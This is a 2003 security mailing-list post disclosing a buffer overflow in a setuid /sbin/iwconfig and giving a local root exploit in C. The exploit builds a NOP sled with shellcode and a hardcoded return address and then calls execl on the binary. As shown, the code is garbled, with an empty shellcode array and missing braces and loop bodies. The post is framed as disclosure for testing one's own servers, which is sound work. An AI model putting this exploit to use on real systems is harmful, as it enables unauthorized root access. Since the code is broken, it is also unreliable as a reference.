iwconfig vulnerability - the last code was demaged sending by email Nov 12 2003 11:25PM
hekuran doli (hekuran doli atikos info)
iwconfig is a tool that manipulate the basic wireless parameters, allowing
privilege escalation due to buffer overflow vulnerability. The iwconfig is
not setuid by default, but I have seen in several places it was. The flowing
exploit has been released to test your servers.

Name: iw-config.c
Copyright: !sh2k+!tc2k
Author: heka
Date: 11/11/2003
Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode,
dunric, termid, kewlcat, JiNKS
Description: /sbin/iwconfig - local root exploit
iwconfig manipulate the basic wireless parameters


#include <stdio.h>

#define BIN "/sbin/iwconfig"

unsigned char shellcode[] =

main ()
int x;
char buf[97], out[1337], *buffer;
unsigned long ret_add = 0xbffffbb8, *add_ptr ;
buffer = buf;
add_ptr = (long *)buffer;
for (x=0; x<97-1; x+=4)
memset ((char *)out, 0x90, 1337);
memcpy ((char *)out + 333, shellcode, strlen(shellcode));
memcpy((char *)out, "OUT=", 4);
execl (BIN, BIN, buf, NULL);
return 0;


Open WebMail Project (http://openwebmail.org)

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus